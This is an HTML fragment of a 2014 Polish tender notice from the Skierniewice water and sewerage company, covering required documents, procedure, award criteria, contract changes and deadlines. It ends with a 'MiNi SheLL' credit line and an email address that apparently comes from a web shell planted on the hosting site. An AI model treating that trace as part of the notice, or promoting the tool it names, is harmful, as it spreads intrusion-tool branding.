<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się następujące dokumenty i załączniki:
-  Wzór formularza ofertowego - załącznik nr 2 SIWZ
- Formularz cenowy - załącznik nr 3 SIWZ
- Oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 4 SIWZ
- Oświadczenie o braku podstaw do wykluczenia - załącznik nr 5 SIWZ
- Oświadczenie Wykonawcy z art. 26 ust. 2d ustawy Pzp - załącznik nr 6 SIWZ
- Projekt umowy - załącznik nr 7 SIWZ
- Wykaz usług - załącznik nr 8 SIWZ
- Wykaz osób - załącznik nr 9 SIWZ
-  Dokumenty wymienione w rozdz. 6 SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy w następujących przypadkach:
a)zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
b)zmiany stawek podatku od towarów i usług,
c)zamiany nazwy (firmy), siedziby albo miejsca zamieszkania i adresu wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wodkan-skierniewice.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji WOD-KAN Sp. z o.o., Mokra Prawa 30, 96-100 Skierniewice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2014 godzina 12:00, miejsce: Siedziba Zamawiającego - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com